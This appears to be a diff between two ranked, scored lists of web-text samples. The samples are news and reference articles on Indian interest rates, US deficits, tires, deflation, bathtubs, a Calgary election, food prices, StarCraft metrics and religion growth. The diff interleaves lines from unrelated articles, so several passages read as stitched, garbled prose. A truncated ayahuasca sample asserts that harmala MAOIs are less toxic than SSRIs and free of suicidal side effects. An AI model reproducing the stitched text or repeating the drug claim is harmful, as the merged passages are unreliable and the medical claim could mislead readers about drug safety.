of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 43; Score = 432128.0 +<|begin_of_text|>During the Reserve Bank of India’s (RBI) press conference last week, one exchange stood out. Asked about a meeting scheduled by the finance ministry in New Delhi to discuss the RBI’s policy, the governor of India’s central bank, Urjit Patel, replied: “The meeting did not take place. All the MPC members declined the request of the finance ministry for that meeting." -Unchanged interest rates would imply your home loan EMIs, which eat away large chunks of household incomes, are unlikely to fall anytime soon. +The MPC is the Monetary Policy Committee, a six-member council that sets India’s benchmark interest rates. It’s a new institution, less than a year old; Patel’s predecessor, Raghuram Rajan, had full authority to set interest rates himself. But it seems India’s government is not as comfortable as many had hoped with this new arrangement—summoning the MPC members to the finance ministry before they decided rates was widely seen as an attempt to interfere in their decision. -High loan rates could influence people’s decision to buy houses, cars and other consumer goods, mostly bought through loans. +So it’s a great relief that the RBI stood firm. Its independence has been questioned of late, partly because of the circumstances in which Rajan left, under pressure from lawmakers in New Delhi, and partly because of its supine acceptance of the government’s controversial decision in November to withdraw 86% of India’s currency from circulation. The government should never have asked for the meeting; but, given that it did, the members of the MPC were right to refuse. -The benchmark lending rate has remained unchanged since January last year, demonstrating the RBI governor’s unwavering commitment to keep inflation firmly bottled up for longer period of time, before softening of the rather hawkish stance. +Also read: India’s war of the Mandarins leaves companies as victims -Budding revival signs in the broader economy and falling inflation rates had rekindled hopes that the RBI would lower loan rates to assist companies’ investment plans, critical to spin jobs and multiply income. +In any case, they knew what the government was likely to say: “Please, for the love of God, cut rates." India is confronting a growth slowdown that is born, most agree, out of a sustained crisis in private investment. It doesn’t take a meeting with the government for the MPC to know that. Yet it has ignored the pleas of officials—and of many in the private sector—and kept rates steady. -Rajan retained the repo rate -- the rate at which banks borrow from RBI -- at 8%, and kept the cash reserve ratio (CRR)-- the proportion of deposits banks to have to park with the central bank -- at 4%, in the bi-month monetary policy review. +This determination emerges from another relatively recent reform: an agreement between the central bank and the government to shift to targeting consumer price inflation. A clear goal for the RBI—rather than a vague admonition that it should care about growth, prices and the exchange rate all at once—adds to its independence and clarifies its approach to monetary policy. But the government has grown increasingly frustrated. After all, not only is growth slowing, but the RBI has refused to reduce interest rates even as the inflation rate has fallen to historic lows. -Retail inflation eased in to a three-year low of 5.52% in October, below the central bank's target of 6% by 2016. +Some argue that the MPC is simply ignoring or misreading the evidence. Even the RBI had to admit that its inflation forecast for the first quarter was off by an unusually large 1.4 +================================================================================ +Rank = 44; Score = 430080.0 +<|begin_of_text|>"We cut our deficits by more than half." -India’s wholesale inflation rate -- the main gauge to capture country-wide price movements -- has also plunged to a five-year low of 1.77% in October, triggering a chorus of demand for lower borrowing costs to boost investment and consumer spending. +In 2012, PolitiFact twice rated True claims that President Barack Obama failed to keep a promise to cut federal deficits in half by the end of his first term. -The next monetary policy is scheduled for February 3, 2015, but Rajan did not rule out a rate revision outside of the policy calendar depending on future price movements. +At that point, the budget gap topped a trillion bucks and Republican congressmen called out Obama because the deficit had been reduced by just 15 percent. -“A change in the monetary policy stance at the current juncture is premature. However, if the current inflation momentum and changes in inflationary expectations continue, and fiscal developments are encouraging, a change in the monetary policy stance is likely early next year, including outside the policy review cycle,” Rajan said. +But there was the president at Laborfest 2014 in Milwaukee proclaiming "we cut our deficits by more than half." -Analysts said the RBI governor could wait for cues to come from the next year’s Union budget in February before initiating any rate action. +In his Sept. 1, 2014 speech, the president ticked off for union supporters a list of major policy decisions he contends helped boost the economy and improve the government’s bottom line. -Industry leaders have been ratcheting up their demand for cheaper loans with the government also hoping that the central bank would signal a reversal of its prolonged hawkish stance that some see as affecting capacity expansion plans. +We can’t cover all of those here, but the deficit claim grabbed our attention. -According to experts low and stable interest rates are critical to fast-track roads, ports, airports, and railways projects to create -================================================================================ -Rank = 37; Score = 913408.0 -<|begin_of_text|>Price to Earnings Ratio (P/E) +Has it really been cut in half? -The price to earnings ratio (denoted P/E) measures the relationship between the share price to its earnings per share. It is considered one of the most important metric of a company because comparing two similar companies’ P/E shows us which is a better value. Sometimes, people will refer to this ratio as the price to earnings multiple, or simply the multiple of a company. +The White House Office of Management and Budget pointed us to a chart prepared by that office in 2013 as proof of Obama's claim. -What Price-Earnings Ratio Represents +It compares the yearly deficits under Obama, expressed -- as they often are -- as a share of the nation’s entire economy, which is measured by the Gross Domestic Product. -The P/E ratio lets investors know what the price of a particular stock is related to the earnings it makes. If a company makes $5 and has a share price of $50, then the P/E is simply 10 (50 divided by 5). With this information, an investor can clearly see that the general public is currently willing to pay $10 for every $1 that the company makes. This also means that the lower this number, the better value the investment potentially is. +At the start of Obama’s term, the chart showed, the figure was 9.2 percent. The latest figure was 4.1 percent. -What the Ratio is Telling Us +That appears to back Obama's statement. -Investors love growth. So a high P/E usually represents the general public anticipating high growth in the months ahead. This could be based on the company’s track record, anticipation of a new product launch, or macroeconomics such as a good economy. +But let's examine this in detail. -In some ways, this ratio also tells us the confidence level in the stock. When investors are willing to pay a higher multiple for a stock versus another, it generally means that they are more confident that the company’s share price will rise quicker the rest. +To do that, we reviewed figures published by the Congressional Budget Office as well as the White House’s Office of Management and Budget. We also consulted with independent fiscal experts. -A Simple Example +The baseline year for comparison is fiscal year 2009, which ended Sept. 30 of that year. This was the last budget from President George W. Bush, as Obama took office in January of that year. -Company A and B having a stock price of $20 and $30 respectively says nothing about the relative value of the enterprises. However, if they both earn $1 per share, then comparing their P/E ratio of 20 and 30 tells us that investors are currently willing to pay $20 for each dollar that company A earns and $30 for each dollar company B makes. With this information, we can see that company A is a relatively better value than company B if all else is equal. +The most recent complete fiscal year is 2013. -What to Watch Out For +Those are the same years Obama's chart showed. -Investors need to take caution when comparing P/E ratios of two companies. If we look at different industries, we will see vast differences in P/E ratios. For instance, technology stocks’ having a P/E of 30 is not uncommon but an oil service company may have a P/E of 10. While the oil service company may look like a better value, it does not mean that every oil service company is a better investment than a technology company. Therefore, P/E ratios should be used to compare +Our analysis showed the drop easily topped 50 percent, and was actually somewhat higher than Obama's chart would indicate. + +As a share of the economy, we found -- and our experts confirmed -- the drop was from 9.8 percent in 2009 to 4.1 percent in 2013. + +Obama’s chart actually reflects a lower deficit figure for 2009, and therefore a lower share of GDP, 9.2%. + +That’s because instead of using the actual 2009 deficit of $1.4 trillion, Obama lowers it by the $200 billion in increased deficit spending that he -- not Bush -- pushed through in the stimulus plan to address the crisis that became the ================================================================================ -Rank = 38; Score = 884736.0 -<|begin_of_text|>During the Reserve Bank of India’s (RBI) press conference last week, one exchange stood out. Asked about a meeting scheduled by the finance ministry in New Delhi to discuss the RBI’s policy, the governor of India’s central bank, Urjit Patel, replied: “The meeting did not take place. All the MPC members declined the request of the finance ministry for that meeting." +Rank = 45; Score = 430080.0 +<|begin_of_text|>Low rolling resistance tires are designed to reduce the energy loss as a tire rolls, decreasing the required rolling effort — and in the case of automotive applications, improving vehicle fuel efficiency. Approximately 5–15% of the fuel consumed by a typical car may be used to overcome rolling resistance.[1] A 2003 California Energy Commission (CEC) preliminary study estimated that adoption of low-rolling resistance tires could save 1.5–4.5% of all gasoline consumption, but that current data were also insufficient to compare safety and other characteristics.[2] -The MPC is the Monetary Policy Committee, a six-member council that sets India’s benchmark interest rates. It’s a new institution, less than a year old; Patel’s predecessor, Raghuram Rajan, had full authority to set interest rates himself. But it seems India’s government is not as comfortable as many had hoped with this new arrangement—summoning the MPC members to the finance ministry before they decided rates was widely seen as an attempt to interfere in their decision. +A United States National Highway Traffic Safety Administration (NHTSA) study in 2009 found that if 2% of the replacement tires would reduce their rolling resistance by 5%, there would be 7.9 million gallons fuel and 76,000 metric tons of CO2 saved annually. -So it’s a great relief that the RBI stood firm. Its independence has been questioned of late, partly because of the circumstances in which Rajan left, under pressure from lawmakers in New Delhi, and partly because of its supine acceptance of the government’s controversial decision in November to withdraw 86% of India’s currency from circulation. The government should never have asked for the meeting; but, given that it did, the members of the MPC were right to refuse. +(SAE J1269 and SAE J2452) performed on new tires. -Also read: India’s war of the Mandarins leaves companies as victims +Measuring rolling resistance in tires [ edit ] -In any case, they knew what the government was likely to say: “Please, for the love of God, cut rates." India is confronting a growth slowdown that is born, most agree, out of a sustained crisis in private investment. It doesn’t take a meeting with the government for the MPC to know that. Yet it has ignored the pleas of officials—and of many in the private sector—and kept rates steady. +Rolling resistance can be expressed by the rolling resistance coefficient (RRC or C rr ), which is the value of the rolling resistance force divided by the wheel load. A lower coefficient means the tires will use less energy to travel a certain distance. The coefficient is mostly considered as independent of speed, but for precise calculations it is tabled at several speeds or an additional speed-dependent part is used. The Society of Automotive Engineers (SAE) has developed test practices to measure the RRC of tires. These tests (SAE J1269 and SAE J2452) are usually performed on new tires. -This determination emerges from another relatively recent reform: an agreement between the central bank and the government to shift to targeting consumer price inflation. A clear goal for the RBI—rather than a vague admonition that it should care about growth, prices and the exchange rate all at once—adds to its independence and clarifies its approach to monetary policy. But the government has grown increasingly frustrated. After all, not only is growth slowing, but the RBI has refused to reduce interest rates even as the inflation rate has fallen to historic lows. +When measured by using these standard test practices, most new passenger tires have reported RRCs ranging from 0.007 to 0.014.[3] In the case of bicycle tires, values of 0.0025 to 0.005 are achieved.[4] These coefficients are measured on rollers, with power meters on road surfaces, or with coast-down tests. In the latter two cases, the effect of air resistance must be subtracted or the tests performed at very low speeds. In 2009 The CEC used a rating called Rolling Resistance Force RRF. RRF and RRC, rolling resistance coefficient are very similar. Difference is taking the RRF and dividing it by the load(weight) to get RRC. So a Michelin Harmony tire rated at 9.45 RRF at 1000 pounds load would be.0095 RRC.[5][6] -Some argue that the MPC is simply ignoring or misreading the evidence. Even the RBI had to admit that its inflation forecast for the first quarter was off by an unusually large 1.4 +In Canada, Transport Canada tests will be conducted ================================================================================ -Rank = 39; Score = 880640.0 -<|begin_of_text|>0 +Rank = 46; Score = 428032.0 +<|begin_of_text|>U.S. may face deflation, a problem Japan understands too well -I sat on the porch +Economists worry that America could be edging closer to the trap that cost the other nation more than a decade of growth. -Listened to the rain +But soon, lower prices cut into business profits, and managers begin to trim payrolls. That in turn undermines consumers' buying power, leading to more pressure on profits, jobs and wages — as well as cutbacks in expansion and in the purchase of new plants and equipment. -Smoked a cigarette +When deflation begins, prices fall. At first that seems like a good thing. -And counted to ten Oh no, here it comes again +And as Tokyo's experience suggests, deflation can be at least as tough a problem as the soaring prices of inflation or the financial pain of a traditional recession. -That funny feeling ― Camper Van Beethoven, Oh No! (1985) +But increasingly, economists and other analysts are expressing concern that the United States could be edging closer to a different problem — the kind of deflationary trap that cost Japan more than a decade of growth and economic progress. -A quick post-Fed follow-up to “Tell My Horse”, the best-received Epsilon Theory note to date (thank you!). I’ll jump right into what I’ve got to say, without the usual 20 pages of movie quotes and the like. Well, I’ve got one quote above, because I can’t help myself. They’re the lyrics to the best break-up song ever, and they’re what Janet Yellen was singing to the market on Wednesday. +Reporting from Washington — The White House prediction Friday that the deficit would hit a record $1.47 trillion this year poured new fuel on the fiery argument over whether the government should begin cutting back to avoid future inflation or instead keep stimulating the economy to help the still-sputtering recovery. -Let’s review, shall we? Last fall, the Fed floated the trial balloon that they were thinking about ways to shrink their balance sheet. All very preliminary, of course, maybe years in the future. Then they started talking about doing this in 2018. Then they started talking about doing this maybe at the end of 2017. Two days ago, Yellen announced exactly how they intended to roll off trillions of dollars from the portfolio, and said that they would be starting “relatively soon”, which the market is taking to be September but could be as early as July. +Also, consumers who are financially able to buy often wait for still lower prices, adding to the deflationary trend. -Now what has happened in the real world to accelerate the Fed’s tightening agenda, and more to the point, a specific form of tightening that impacts markets more directly than any sort of interest rate hike? Did some sort of inflationary or stimulative fiscal policy emerge from the Trump-cleared DC swamp? Umm … no. Was the real economy off to the races with sharp increases in CPI, consumer spending, and other measures of inflationary pressures? Umm … no. On the contrary, in fact. +All these factors feed on one another, setting off a downward spiral that can be as hard to escape from as a stall in an airplane. -Two things and two things only have changed in the real world since last fall. First, Donald Trump — a man every Fed Governor dislikes and mistrusts — is in the White House. Second, the job market has heated up to the point where it is — Yellen’s words — close to being unstable, and is — Yellen’s words — inevitably going to heat up still further. +For now, the dominant theme of the nation's economic policy debate remains centered on the comparative dangers of deficits and inflation. However, economists across the political spectrum — here and abroad — are talking more often about the potential for deflation. -What has happened (and apologies for the ten dollar words) is that the Fed’s reaction function has flipped 180 degrees since the Trump election. Today the Fed is looking for excuses to tighten monetary policy, not excuses to weaken. So long as the unemployment rate is on the cusp of “instability”, that’s the only thing that -================================================================================ -Rank = 40; Score = 868352.0 -<|begin_of_text|>A gyro rotor | NASA +So how likely is the problem? -If you’ve ever tried to give yourself a haircut, you know just how hard it is to make something precisely symmetrical. We value symmetry so highly in part because it’s really hard to achieve. +The latest U.S. data are sobering: Consumer prices overall have declined in each of the last three months, putting the inflation index in June just 1.1% above a year earlier. The core inflation rate — a better gauge of where prices are going because it excludes volatile energy and food items — has dropped to a 44-year low of 0.9%. -Here are five of the most symmetrical objects humans have ever crafted, and why they were so hard to make. +That's well below the 1.5%-to-2% year-over-year inflation that the Federal Reserve likes to see, and some Fed policymakers have raised concerns about the rising risk of a broad decline in prices. -Strikingly symmetrical pieces of ear jewelry, alleged to be centuries old, have been seized on by conspiracy theorists. +Private economists and financial experts have expressed much greater concern. -Gravity Probe B quartz gyroscope rotors +"I think we have to take it seriously," said John Mauldin, president of Millennium Wave Advisors in Dallas, who puts the probability of def +================================================================================ +Rank = 47; Score = 423936.0 +<|begin_of_text|>Private cast iron bathtubs with porcelain interiors on "claw foot" pedestals rose to popularity in the 19th century -In 2004, Gravity Probe B (GP-B) was launched into space on a Delta II rocket with the mission of testing the theory of general relativity. The Earth-orbiting satellite included a set of gyroscopes that could measure two of the phenomena predicted by general relativity: the curvature of spacetime (the geodetic effect) and the distortion of spacetime by large objects (frame-dragging). In order to measure these things, the gyroscopes had to be incredible accurate. Being off by anything larger than one one-hundred-billionth of a degree every hour would ruin the experiment. Standard gyroscopes used on submarines and military aircraft, for comparison, are over 10 million times less accurate. +A bathtub, bath, or tub (informal) is a large or small container for holding water in which a person or animal may bathe. Most modern bathtubs are made of thermoformed acrylic, porcelain enameled steel, fiberglass-reinforced polyester, or porcelain enameled cast iron. A bathtub is usually placed in a bathroom either as a stand-alone fixture or in conjunction with a shower. -The key to building such an accurate gyroscope was creating perfectly symmetrical rotors, the quickly spinning elements that allow gyroscopes to maintain their orientation. These rotors had to be totally balanced, and completely homogenous inside as well. The GP-B team crafted these little spheres out of pure quartz blocks that were grown in Brazil and baked in Germany. The surface of each gyroscope is almost completely spherical, only about three ten-millionths of an inch away. +Modern bathtubs have overflow and waste drains and may have taps mounted on them. They are usually built-in, but may be free-standing or sometimes sunken. Until recently, most bathtubs were roughly rectangular in shape, but with the advent of acrylic thermoformed baths, more shapes are becoming available. Bathtubs are commonly white in colour, although many other colours can be found. The process for enamelling cast iron bathtubs was invented by the Scottish-born American David Dunbar Buick. -According to the Guinness Book of World Records, these are the roundest objects ever made. The Stanford team that worked on the spheres says only neutron stars are more spherical. +Two main styles of bathtub are common: -Avogadro Project silicon kilogram +Western style bathtubs in which the bather lies down. These baths are typically shallow and long. -Gravity Probe B’s only real contender, when it comes to perfect spheres, is the ball that should soon define a kilogram. This sphere is the result of The Avogadro Project, and its raw materials alone cost over a million dollars. The goal is to to supersede and replace the international prototype kilogram (IPK). The kilogram is the very last unit in the International System of Units (essentially, the metric system) that is still defined by a physical object—a cylinder made of platinum-iridium alloy—rather than physical principles. That cylinder currently sits under three nested bell jars in a climate-controlled vault just outside of -================================================================================ -Rank = 41; Score = 856064.0 -<|begin_of_text|>When Jacob and Wilhelm Grimm published their “Children’s and Household Tales” in 1812, followed by a second volume in 1815, they had no idea that such stories as “Rapunzel,” “Hansel and Gretel,” and “Cinderella” would become the most celebrated in the world. Yet few people today are familiar with the majority of tales from the two early volumes, since in the next four decades the Grimms would publish six other editions, each extensively revised in content and style. For the very first time, ” The Original Folk and Fairy Tales of the Brothers Grimm” makes available in English all 156 stories from the 1812 and 1815 editions. These narrative gems, newly translated and brought together in one beautiful book, are accompanied by sumptuous new illustrations from award-winning artist Andrea Dezso. +Eastern style bathtubs in which the bather sits up. These are known as furo in Japan and are typically short and deep. -From “The Frog King” to “The Golden Key,” wondrous worlds unfold–heroes and heroines are rewarded, weaker animals triumph over the strong, and simple bumpkins prove themselves not so simple after all. Esteemed fairy tale scholar Jack Zipes offers accessible translations that retain the spare description and engaging storytelling style of the originals. Indeed, this is what makes the tales from the 1812 and 1815 editions unique–they reflect diverse voices, rooted in oral traditions, that are absent from the Grimms’ later, more embellished collections of tales. Zipes’s introduction gives important historical context, and the book includes the Grimms’ prefaces and notes. +History of bathtubs and bathing [ edit ] -The source material for Children’s and Household Tales was originally collected from books as well as friends and acquaintances in and around Kassel, Hesse in what is now Germany as well as Westphalia for the romantic poet Clemens Brentano between 1806 and 1812. Jacob and Wilhelm Grimm eventually came to distinguish between the Naturpoesie of the German Volk and the Kuntspoesie, or cultivated literature, which arose from and subsumed it. Ultimately, Brentano found the collected tales unsuitable toward his purposes and gave the brothers his blessing to do with them as they pleased. The first edition of Kinder- und Hausmärchen was published in 1812. +Traditional bathtub (19th century) from Italy -While even those tales were edited in order to create something more than a skeletal fragment of a story, they are generally representative of local traditions. The Grimms explained in their introduction (included) +Documented early plumbing systems for bathing go back as far as around 3300 BC with the discovery of copper water pipes beneath a palace in the Indus Valley Civilization of ancient India; see sanitation of the Indus Valley Civilization.[citation needed] Evidence of the earliest surviving personal sized bath tub was found on the Isle of Crete where a 1.5-metre (5 ft) long pedestal tub was found built from hardened pottery.[1] -“We have tried to grasp and interpret these tales as purely as possible. In many of them one will find that the +The clawfoot tub, which reached the apex of its popularity in the late 19th century; had its origins in the mid 18th century, where the ball and claw design originated in Holland, possibly artistically inspired by the Chinese motif of a dragon holding a precious stone. The design spread to England where it found much popularity among the aristocracy, just as bathing was becoming increasingly fashionable. Early bathtubs in England tended to be made of cast iron, or even tin and copper with a face of paint applied that tended to peel with time. + +The Scottish-born inventor David Buick invented a process for bonding porcelain enamel to cast iron in the ================================================================================ -Rank = 42; Score = 819200.0 +Rank = 48; Score = 421888.0 <|begin_of_text|>City hall, under the leadership of a mayor Andre Chabot, would focus more on its core fiscal responsibilities and less on social spending, says the veteran Ward 10 councillor who recently launched his 2017 mayoral campaign, pitting him against Mayor Naheed Nenshi in the Oct. 16 election. In a wide-ranging interview with Postmedia this week, Chabot touted the “common man” appeal of his platform, pledged to change the tone at city hall, hold the line on municipal property tax increases to the consumer price index, and questioned the effectiveness of “handouts” for the city’s poorest. @@ -926,159 +1078,101 @@ Applicants are only eligible for the subsidy if the entire household income is a Franco Savoia, executive director for Vibrant Communities Calgary, praised the city’s efforts to remove barriers and offer some relief ================================================================================ -Rank = 43; Score = 815104.0 -<|begin_of_text|>Image caption A slowdown in key sectors such as manufacturing has hurt India's growth rate - -India's economic growth rate picked up strongly in the most recent quarter, according to official figures. - -The economy expanded at an annual rate of 4.8% in the July-to-September period, up from 4.4% in the previous quarter. - -The acceleration was faster than analysts had been expecting. - -Asia's third-largest economy has been weighed down by various factors, such as high inflation, a weak currency and a drop in foreign investment. - -This is the fourth quarter in a row that India's annual growth rate has been below the 5% mark, and the previous quarter's rate of 4.4% was the lowest for four years. - -Earlier this year, the Indian prime minister's economic advisory council lowered the growth outlook for the current financial year. - -It now expects the economy to expand by 5.3% this year, down from its earlier projection of 6.4%. - -Growth hurdles - -India's economy has been hurt by a range of factors in recent months, including a slowdown in key sectors such as mining and manufacturing. +Rank = 49; Score = 409600.0 +<|begin_of_text|>Consumers are paying sharply higher prices for beef, and other meat, this year, according to the government's consumer price index for March, released April 15, 2014. (Photo11: Jim Cole AP) -Slowing growth, coupled with a recovery in developed markets, such as the US, has made India a less attractive option for foreign investors. +Two months of sharp increases in food prices show grocers are starting to pass along their higher wholesale costs to consumers. -Speculation that the US may scale back its key economic stimulus measure has seen investors pull money out of emerging markets, such as India. +Retail food prices rose 0.4% in March, the same as in February and the largest amount since September 2011. By comparison, the prices of all consumer goods rose 0.2% in March and 0.1% the month before, reports the Bureau of Labor Statistics. -This has affected India's currency, which dipped nearly 25% against the US dollar between January and September this year. +Beverly Cabellon, 61, of Pleasant Hill, Calif., was taken aback by the $38 price for two steaks at Costco recently, up from the $27 she paid last September. "I will be grilling more vegetables and shrimp this summer," she says, adding that she and her husband will likely eat beef once a month instead of weekly. "And I may switch to pork and chicken." -Though the rupee has recovered a little since then, it is still down about 13% against the dollar since the start of this year. +Beef, pork, poultry, eggs and milk have had the most dramatic price increases as drought, a virus outbreak and rising exports have thinned U.S. supplies. -That has made imports more expensive and contributed to a high rate of consumer inflation, which was 10.1% October, up from 9.84% in September. +Overall consumer prices rose 0.2% in March, a bit more rapidly than in recent months, and annual inflation was 1.5%, up from 1.1% in February. -High food and fuel prices have contributed to inflation becoming "entrenched", finance minister P Chidambaram said. +Annual inflation was 1.5% in March, up from 1.1% in February. That's well below the Federal Reserve's 2% target, as falling gasoline prices offset rising food costs. -As a result, the central bank has had to raise the cost of borrowing in a bid to curb inflation. +But higher food bills are squeezing households still struggling with meager wage gains, and could crimp spending just as the recovery is expected to accelerate. -The latest interest rate rise in October saw the key rate increase to 7.75%. +Cheryl Stewart, 38, of Perry Hall, Md., says higher prices for meat and milk have prompted her to drive 10 to 15 miles to grocery stores in low-income areas that carry more obscure brands at lower prices. She also spreads the food shopping for her family among three or four stores to get the best prices. -Some observers argue that high interest rates are hurting businesses and households, and having a negative impact on the economy. +"Living standards will suffer as a larger percentage of household budgets are spent on grocery store bills, leaving less for discretionary spending," says economist Chris Christopher of IHS Global Insight. -"A combination of weak investment, high inflation and tight monetary policy would not let India's economic recovery gather steam any time soon," Miguel Chanco, Asia economist at Capital Economics, told the BBC.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +A drought that thinned cattle herds two years ago has driven up wholesale beef prices 23% the past year, according to Sterling Marketing. Meanwhile, a virus outbreak in the hog population has pushed up pork prices by 56%, the ================================================================================ -Rank = 44; Score = 815104.0 -<|begin_of_text|>Overview - -the growth in chronic disease - -increasing patient expectations about access to services - -the number and range of health services provided - -the increasing cost of those services - -an ageing population. - -Australia has a mixed public and private model of health care funding and service delivery. Private health insurance offers members greater choice in the provision of treatment, coverage for some services not included under Medicare arrangements, and may offer shorter waiting times for some services.As at 30 June 2015, 11.3 million Australians were covered by hospital treatment cover (47.4% of the population) and 13.3 million Australians had some form of general treatment cover (55.8% of the population). In 2014-15 the Australian Government spent $5.8 billion on the Private Health Insurance Rebate.In common with public health funding, private health insurance sustainability is being impacted by:The Australian Government is undertaking a number of reviews aimed at ensuring that consumers can access affordable, quality and timely health services into the future. - -Private health insurance has important links to these reviews. As such, on 28 October 2015 the Minister for Health, the Hon Sussan Ley MP, announced consultations focused on the value of private health insurance for consumers and its long term sustainability. View the Scope of the Consultations here. +Rank = 50; Score = 397312.0 +<|begin_of_text|>What is Spending Skill? -Announcement of Consultations +Summary: We measure your Spending Skill as a league score, ranging from Bronze to Grandmaster. For each game you play, your Average Unspent Resources (AUR) and Income are combined into a single number (called Spending Quotient, also known as SQ). Your Spending Skill is based on typical SQ levels for your race, region (NA, EU, etc) and game length. As you can see from the Spending Skill Stats, long games tend to have lower SQs. For example, an SQ of 76 for an EU Protoss in a 27-minute game is a Grandmaster-level performance, but in a 7-minute game that same SQ is only Platinum level. and then similarity-checked against our Starcraft library of more than 100,000 1v1 ladder games. -Information for Consumers +There's an excellent article called Do you macro like a pro? which studies 2,100 games and proves that pros spend their resources better than noobs. -Overview of Consultations +Spending can make a big difference. Let's say you and your enemy have the same income, and the same tech, but you have 1,000 unspent resources and she has 0. Then her army is going to be 1,000 resources bigger than yours. That's 20 extra marines. Assuming her micro skill is equal to yours, then she's going to win. -Minister Ley announced consultations on 28 October 2015 during her address to the National Press Club. View her address on the Department's website Private health insurance is complex. View the Consumer Fact Sheet For more information about private health insurance, visit the Private Health website (www.privatehealth.gov.au).An online consumer survey opened 8 November 2015 and closed on 7 December 2015. There was a large public response to the survey with over 40,000 Australians taking the opportunity to have their say on private health insurance.The results from the consumer survey showed that the cost of private health insurance was of greatest concern to consumers overall. Expense, affordability and lack of value for money were issues common to people both with and without private health insurance. +Don't let her win!! -Targeted industry roundtables were held in the week of 16 November 2015. Eight roundtables were held in Canberra, Melbourne and Sydney with over 100 organisations represented. +After every game, the Score Screen shows your Average Unspent Resources (AUR). But that one number doesn't tell you if you did a good or bad job on spending. -Interested stakeholders were able to provide submissions to the Department of Health by 4 December 2015. +An AUR of 1,000 is great when your Resource Collection Rate (aka Income) is 1,900, but it's not good when your Income is 400. So AUR alone isn't enough to know if your Spending was good. -An issues paper was developed to guide the roundtables and submissions. +Do you macro like a pro? introduced the idea of Spending Quotient (SQ), a formula that combines AUR and Income into a single score, usually between 40 and 100, that measures how well you're spending. It's a nice formula, it's even got a logarithm in it. -The written submissions indicated that stakeholders held a wide range of views on -================================================================================ -Rank = 45; Score = 794624.0 -<|begin_of_text|>Growth of religion is the spread of religions and the increase of religious adherents around the world. The statistics are commonly measured by the absolute number of adherents, the percentage of the absolute growth per year, and the growth of the number of converts in the world. Projections of future religious adherence are based on assumptions that trends, total fertility rates, life expectancy, political climate, conversion rates, secularization, etc will continue. Such forecasts cannot be validated empirically and are contentious, but are useful for comparison.[1][2] +Here's a calculator you can use to play with the SQ formula. -Studies in the 21st century show that, in terms of percentage and worldwide spread, Islam is the fastest-growing religion in the world.[3][4][5][6][7][8][9][10][11] A religious forecast for 2050 by Pew Research Center concludes that global Muslim population is expected to grow at a faster rate than the non-Muslim population due primarily to the young age and high fertility rate of Muslims.[12][13] Religious conversion has little impact on Muslim population because the number of people who convert to Islam is nearly offset by those who leave Islam.[6][14][14][15][16] +Resource Collection Rate (Income) Average Unspent Resources Spending Quotient {{ sq }} -Growth of religious groups [ edit ] +Grandmasters and pros get SQ around 100, and bronze leaguers get 40 or 50. -Bahá'í Faith [ edit ] +However, when you get the data together for over 100,000 games*, the fuller picture emerges: -World religions statistics place the Bahá'í Faith around 0.1% of the world population in recent years.[17][18] The World Christian Encyclopedia estimated only 7.1 million Bahá'ís in the world in 2000, representing 218 countries,[18] and its evolution to the World Christian Database (WCD) estimated 7.3 million in 2010[19] while accredited through the Association of Religion Data Archives (ARDA). However the WCD stated: "The Baha'i Faith is the only religion to have grown faster in every United Nations region over the past 100 years than the general population; Baha'i [sic] was thus the fastest-growing religion between 1910 and 2010, growing at least twice as fast as the population of almost every UN region."[20] This source's only documented flaw was to consistently have a higher estimate of Christians than in other cross-national data sets.[21] 2015's estimate is of 7.8 million Bahá'ís in the world.[22] -From its origins in the Persian and Ottoman empires of the 19th century the Bahá'í Faith was able to gain converts elsewhere in Asia, Europe, and North America by the early 20th ================================================================================ -Rank = 46; Score = 786432.0 -<|begin_of_text|>B.caapi contains harmine, harmaline, and tetrahydroharmine, all of which are both beta-carboline harmala alkaloids and Monoamine oxidase inhibitors (MAOIs). The MAOIs in B. caapi allow the primary psychoactive compound, DMT (which is introduced from the other primary ingredient in ayahausca, the Psychotria viridis plant), to be orally active. - -The name ayahuasca means "vine of the soul"and the shamans of the indigenous western Amazonian tribes use the plant in religious and healing ceremonies. In addition to its hallucinogenic properties, caapi is used for its healing properties as a purgative, effectively cleansing the body of parasites and helping the digestive tract. - -Harmala alkaloids are short term yet powerful MAOIs which render tryptamines orally active by temporarily reducing levels of monoamine oxidase in the body which otherwise rapidly destroys them. Their effects are more powerful and less toxic than pharmaceutical SSRIs since they do not lead to suicidal tendencies and other side effects which detrimentally affect human 